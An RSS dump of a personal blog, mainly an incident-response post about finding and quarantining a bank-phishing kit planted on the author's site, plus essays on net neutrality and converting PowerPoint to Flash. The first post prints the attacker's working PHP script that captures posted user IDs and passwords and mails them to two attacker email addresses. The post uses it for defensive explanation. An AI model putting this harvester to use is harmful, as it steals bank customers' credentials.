Chronosynclastic Infundibulum » web http://www.semanticoverload.com The world through my prisms Thu, 07 Apr 2011 17:36:17 +0000 en-US hourly 1 http://wordpress.org/?v=3.5 If your site has been compromised with phishing attack code… http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/ http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/#comments Tue, 17 Mar 2009 07:30:42 +0000 Semantic Overload http://www.semanticoverload.com/?p=316 I recently recevied the following email:

To whom it may concern:

Please be aware that Wachovia Corporation (“Wachovia”) is the owner of numerous United States and foreign trade marks and services marks used in connection with its financial services and products (the “Wachovia Marks”), including the Wachovia wordmark and Wachovia logo.  Wachovia has expended substantial resources to advertise and promote its products and services under the marks and considers the marks to be valuable assets of Wachovia.

It has come to our attention that your company is hosting a known active phishing site.  The active phishing site displays the Wachovia Marks and is intended to defraud customers in an attempt to capture and use their identity.  Network Whois records indicate the IP address of the phishing site is registered to your Internet space.

Accordingly, we request that your site bring down the Phishing web site at:
<< http://<my website>/home/plugins/editors-xtd/confirm.html >>

So that’s how I knew that my site had been compromised by hackers and a phishing attack code had been injected into my site. If it has happened to you, do you know what is the right thing to do? How do you fix it? Well, here is what I did, and I think it is worthwhile to share this information so that it may be useful to others.. So here goes.

Step 1. Disable Your Site

First, disable your site, bring it down temporarily. The last thing you want is for more people to be scammed by a hacker who compromised your site. You can do that by disabling all access to all the files within your website. If the website is running on unix/linux you can do a “chmod -R 000 <website-home-directory>” (Refer to the chmod tutorial here). For those using cpanel, go to the file manager and change the permissions of the document root for the website.

Step 2. Investigate the Offending Webpage

Now that no more unsuspecting users can be affected by this phishing attack. Now we dig into the offending webpage that is causing the problem. In my case it was: http://<my website>/home/plugins/editors-xtd/confirm.html

I opened up the html file, and this is what I saw:

……

<html xmlns=”http://www.w3.org/1999/xhtml”><head>

<title>Wachovia – Personal Finance and Business Financial Services</title>

……

Clearly, someone was impersonating the Wachovia website. Now, with phishing, someone is trying to steal your username and password by impersonating some crediable website that needs your username and password to get into. In HTML, this is typically accomplished through ‘forms’, which starts with a `<form>’ tag in HTML. So I dug through the code and I saw two form tags.

The first one was:

<form method=”get” action=”http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do?” name=”searchForm” onsubmit=”return verifyQuery(this.searchString);”>

…..

This looks fine because the ‘action’ parameter points to http://search.wachovia.com/selfservice…. which is a search script on the Wachovia website. So anyone filling you this form is sendin their data to the Wachovia website and the hacker will not get any information from it.

Now to the second form tag:

<form method=”post” action=”screen.php” name=”uidAuthForm” id=”uidAuthForm” onsubmit=”return submitLogin(this)”>

……

Aha! The smoking gun! Why? Well, look at the ‘action’ parameter in this ‘form’ tag, it says ‘screen.php’ which is clearly not a script that is on the Wachovia servers, but something that is hosted on my website! So the hackers installed another script on my system to phish the username and passwords. Now I go see what’s inside this ‘screen.php’ file that is located in the same directory as the ‘confirm.html’ file we have been looking at so far.

Step 3. Isolate the script that is doing the actual phishing attack and find the offenders

So I open up the ‘screen.php’ file and this is what I find:

<?php

$ip = getenv(“REMOTE_ADDR”);
$datamasii=date(“D M d, Y g:i a”);
$userid = $HTTP_POST_VARS["userid"];
$password = $HTTP_POST_VARS["password"];
$mesaj = “Hello
userid : $userid
password : $password
——–0WN3d By Louis—————-
IP : $ip
DATE : $datamasii
“;

$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;
$subject = “Take What U need But Make Sure U Cash It Out !!!”;

mail($recipient,$subject,$mesaj);
mail($to,$subject,$mesaj);
header(“Location: http://www.wachovia.com/helpcenter/0,,,00.html”);
?>

So here we are! Gotcha! Check out the line ‘$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;’ Clearly, the phishing attack was being carried out by the following two email addresses: cashbug5010@gmail.com and smithgreen@hotmail.com. Now that I have this much information, what do we do next?

Step 4. Inform the Authorities

We give this information to the authorities who can carry the investigation forward. And who are they? First, respond back to the email address that alerted you of this phishing attack (do a ‘reply all’ if there were multiple recipients/Cc’s to the email you received). Also, copy phishing-report@us-cert.gov and cert@cert.org to this email and just give them a copy of the phishing code (in this case it was the file ‘screen.php’) and the offending email addresses you found.

As for now, that is all you can do, and just co-operate with the authorities if they need more information.

Step 5. Quarantine the Malicious Code and Restore Your Website

Quarantine the files (by disabling their permission to ’000′) and now that the code has been quarantined, you can bring your website up again by setting the permission back to as they were earlier (except for the offending code).

DO NOT DELETE THE MALICIOUS CODE BECAUSE IT IS EVIDENCE AGAINST THE PHISHING ATTACK AND EXONERATES YOU! Otherwise, the authorities may pursue you as an accessory to the crime!

Step 6. Inform Google That Your Site is Safe Again

Now, note that the odds are that Google has already put a notice out against your site as a source of a phishing attack. So go to the following URL http://www.google.com/safebrowsing/report_error/ to let Google know that the problem has been taken care off and you site is safe again.

And that’s all you can do for the moment. Make sure your site is secure and you haven’t given permission to any of your directories to be writable by anyone except you. As for preventing future security breaches, it is always a cat-and-mouse game with hackers and like of you getting smarter and better than the other.

]]>
http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/feed/ 7
Rajani ka Ishtyle http://www.semanticoverload.com/2008/09/03/rajani-ka-ishtyle/ http://www.semanticoverload.com/2008/09/03/rajani-ka-ishtyle/#comments Wed, 03 Sep 2008 06:17:46 +0000 Semantic Overload http://www.semanticoverload.com/?p=185 Rajani in Castrol Power 1 Commercial

]]>
http://www.semanticoverload.com/2008/09/03/rajani-ka-ishtyle/feed/ 0
Net Neutrality: what is it really about? http://www.semanticoverload.com/2008/04/25/net-neutrality/ http://www.semanticoverload.com/2008/04/25/net-neutrality/#comments Fri, 25 Apr 2008 22:01:41 +0000 Semantic Overload http://www.semanticoverload.com/?p=158 Net Neutrality has been an ongoing debate for quite a few years now. In its simplest terms, net neutrality is a principle that states that all traffic on the internet must be treated the same way; that there should be no preferential treatment to a specific kind or class of traffic. The are many camps for and against net neutrality. Each group fervently advocates its position on the issue, while slinging mud on the other camp. This debate has polarized large sections of stakeholders on the internet. Unfortunately, most of the polarization is based more on propaganda and prejudice than facts. Investigating the net neutrality issue reveals that the waters are indeed quite muddy.

The groups supporting net neutrality — like SaveTheInternet.com Coalition — argue that net neutrality is fundamental to the success of the internet. Net Neutrality prevents ISPs from speeding up or slowing down Web content based on its source, ownership or destination. If ISPs are allowed to slow certain web content down and speed others up, based of Service Level Agreements (SLA) with content providers (like Reuters, Fox News, Yahoo, Google, Facebook etc.), then this will result in all big corporations signing SLAs with all ISPs, and individual content providers like bloggers will be left out in the cold, and there is little that can be done against such discrimination. In essence, the advocates argue that net neutrality an extension of free speech, and is necessary to protect free speech on the internet. Other implications of not having net neutrality include ISPs allowing (say) Google’s pages to load faster than (say) Yahoo’s (because Google signed an SLA with the ISP), thus denying its users efficient access to their trusted source of information.

The groups opposing net neutrality — like Hands Off The Internet Coalition — argue that heavy regulation of the internet runs against free market economics, and that such restrictions slow down the rate of innovation on the internet. They argue that different kinds of internet traffic have different requirements. For instance, live chat requires less bandwidth, but the traffic cannot be delayed, on the other hand streaming video requires high bandwidth, but can afford some delay because the video is buffered at the viewing computer, downloads can withstand occasional delays and low bandwidth. It makes sense treat each of these traffic streams differently in order to provide a better user experience, but net neutrality prohibits this.

Lets see how the arguments for and against net neutrality really stand up to criticism.

Now, if net neutrality was implemented as a strict regulation, this can give rise to a lot problems. For instance, how do network providers treat spam under net neutrality? Currently, network providers can block spam at the entry point into their network. If the networks are expected to treat all traffic equally, then they have to treat spam the same as other traffic. Which implies that they are having to bear the cost of routing spam on their networks with no income from it. Guess who they will pass that cost on to: the consumers. So is net neutrality really what the consumers want?

If customers subscribed to a pay-per-view service over the internet, then customers have every right to be guaranteed a satisfactory viewing experience. However, the network provider cannot do that under net neutrality because the provider is not allowed to allocate bandwidth for the pay-per-view service. So is net neutrality really helping?

On the other hand, if net neutrality wasn’t implemented then this would allow network providers to treat different kinds of traffic differently, thus providing a better user experience. But if that were truly an issue then how do different classes of network traffic work well today without so-called ‘tiered’ services for different classes of traffic. Answer: there is more bandwidth in the network core than the traffic consumes. As long as there is good admission control on the edge of the Internet, it doesn’t seem like you need such ‘tiered’ services. Wouldn’t that make the ‘tiered’ services argument too weak?

Consider the competition between VoIP services and traditional phone lines. Typically all your phone providers are also ISPs. And VoIP is very sensitive to delay in the traffic, more so than web browsing, streaming video, or downloads. So if the ISPs wanted to discourage their customer from using VoIP services, then they could do that by simply delaying packets for a few seconds randomly. For web browsing and other services, it would only show up as a few seconds delay in a page loading, or a delay in the video starting, which is easily tolerable. But with VoIP, this would show up as a jitter in a voice call. This would make VoIP unusable. Don’t we need regulations to protect the customers from such practices? Isn’t net neutrality a way out of this?

So net neutrality, while addressing some issues, opens up other problems which the Internet community will have to deal with. Worse, while it is easy to make a regulation like net neutrality, it is very difficult to enforce it. How do you detect a violation of net neutrality? If ‘bad’ ISPs are smart enough, then they can hoodwink any mechanism to detect such violations. It can range from delaying all traffic for a few seconds so that only VoIP services are affected, to dropping only certain kinds of traffic during periods of traffic congestion. The above two techniques is indistinguishable from situations where a `good’ ISP is having traffic management problems and so is forced to delay traffic, or is forced to drop traffic during congestion. So how do you distinguish ‘bad’ ISPs from ‘good’ one and penalize only the ‘bad’ ones? Its not always possible.

So, if net neutrality is more a regulation in theory, than something which can be enforced successfully, and people do realize it, then why do we have groups advocating for it so strongly? What could be gained from it, other than a rhetorical stand on the ideals that they strive for? The answer might surprise you.

Ironically, the arguments being made on both sides of net neutrality fails to address the real issue. In fact, it serves to hide the real issue of why net neutrality has become such a focal point of conflict on the internet today. To understand this better, lets see who are the corporate entities involved in the net neutrality debate. The supporters of net neutrality include the likes of Google, Yahoo, eBay and AeA. The opposers of net neutrality include the likes of 3M, Cisco Systems, Qualcomm, Verizon, AT&T, and Time Warner. Note that there is a clear division of the functional roles of each camp. The camp which supports net neutrality are all content providers where as the camp which opposes net neutrality are all network infrastructure providers.

Why do content providers like net neutrality? Because it allows the content providers to innovate and come up with new applications and solutions without having to worry about how these application will be treated by the network. Why do network infrastructure providers oppose net neutrality? Because this will aloow for innovation and diversity in network infrastructure to accommodate new applications and solution which can evolve from the Internet. What does this mean? This means that net neutrality is no longer about free speech, or democracy, or free market, or any ideals. Its all about who gets to control the internet and the innovation in it. Net neutrality, under the hood, is an ongoing battle between content providers and infrastructure providers over who controls the web and the innovation in it.

]]>
http://www.semanticoverload.com/2008/04/25/net-neutrality/feed/ 0
Making Your Presentations Portable http://www.semanticoverload.com/2008/04/21/making-your-presentations-portable/ http://www.semanticoverload.com/2008/04/21/making-your-presentations-portable/#comments Mon, 21 Apr 2008 22:32:18 +0000 Semantic Overload http://www.semanticoverload.com/?p=150 I had the following problem(s):

  • I had a fairly large presentation which I had to share among several people for review.
  • Not everyone was running the same version of Powerpoint, and not everyone used Windows.
  • People who wouldn’t be able to make it to my actual presentation wanted to be able to view it (along with the voice narration) later.
  • I wanted it to be accessible and usable by everyone regardless of the OS, the browser, or the presentation software they were using.

I figured this was a pretty common problem that many people face and a documented solution would be nice. More so, since someone I demonstrated this solution to now swears by it and can’t thank me enough. So I figured, why not spread the knowledge :) (Unfortunately, this solution works only if you are using Windows XP/Vista. Sorry, I couldn’t find the right tools to make it work on MAC OS X.)

Here’s the bird’s eye view of my solution:

  1. Prep your presentation to be made ‘complete’ and ‘kiosk-ready’.
  2. Download and install AuthorPoint Lite.
  3. Import the presentation into AuthorPoint Lite, and preserve the rehearse timings, animations, and (optionally) narration.
  4. Convert the presentation to flash using AuthorPoint Lite.
  5. Upload the generated swf file online for the world to see!
  6. The End.

Prepping your presentation

Before you can make a presentation portable, you have got to make sure that the presentation itself has enough information in it to be portable. Also, you have to ensure that the presentation have been configured so that the tools you will use to make it portable can use it to advantage.

So here’s how you would go about the job:

Ensure all information is available

When are making a presentation portable, then, more often than not, the people who will access it will not have the luxury of you walking through the presentation for them. So make sure you have notes for each slide for the presentation to be understandable on its own, even without the speaker present. It often a good idea to include the text of your narration for each slide in the Slide Notes section.

Recording Narration

You also have the choice of recording your narration. You can do this if you would like people to be able to view and hear your presentation online. In order to record your presentation (Assuming you have a workgin microphone to record) you need to do the following:

  • Ensure that you have no automatic animations set. You can do that as follows:
    1. Click on the Slide Show menu and choose Custom Animation.
    2. Click on the first item in the Animation Order box on the Order & Timing tab.
    3. Select the On Mouse Click radio button under Start Animation as shown in the figure below.Unset Custom Animation
  • Test your microphone by opening Slide Show -> Record Narration -> Set Microphone Level button. You’ll see the Microphone Check dialog box pop up. Set the level appropriately as shown below:Testing Microphone
  • You can adjust the sound quality if you like:
    Adjust Sound Quality
  • DO NOT check the ‘Link the Narrations’ checkbox! This option being unchecked is very important for portability!
  • Now start recording you narration and manually click through the slides (and animation) as you narrate into the microphone. You can stop anytime by pressing [Esc]. After you reach the last slide, or after you press [Esc], PowerPoint will ask if you’d like to save the slide timings. Click No. (As shown below):
    Save Slide Timings Dialog
  • Now you can browse through the slides and review your narration by clicking on the sound icon icon. You can delete the narration on each slide and record the narration if necessary.

Rehearsing Timing

Click on the Slide Show menu and choose Rehearse Timings. You’ll immediately be transferred into Slideshow View, and the narration should begin. You’ll see a Rehearsal toolbar appear:

rehearse timing

Advance through the presentation by advancing to the next slide when the narration for each slide is complete. Also make sure that you step through the animation appropriately. When you’ve scrolled through the entire presentation, PowerPoint will again ask if you’d like to save the timings. Click Yes.

Now your presentation is self-contained and complete. However, it is still a .ppt file. To make it portable, you need to convert it to a more portable format. My choice is ShockWave File, or Flash format.

AuthorPoint Lite

AuthorPoint Lite is a free Powerpoint-to-Flash converter. The neat thing about this software is that it can import all the settings from a powerpoint slide including narration, rehearsed timing, custom animation etc. Here is a great review on AuthorPoint Lite.

  • Download and install AuthorPoint Lite
  • Import your presentation into AuthorPoint Lite.
  • Save it as a swf file.

Uploading the swf file

Now upload the saved swf file to your webserver, and provide a link to it on your website. This swf file is your presentation complete with your narration, animation, slide timings, your slide notes, etc. And the best part is that sinceits a swf file, any browser with a flash plugin can play this file! Truly portable!

Enjoy

The End

:)

]]>
http://www.semanticoverload.com/2008/04/21/making-your-presentations-portable/feed/ 5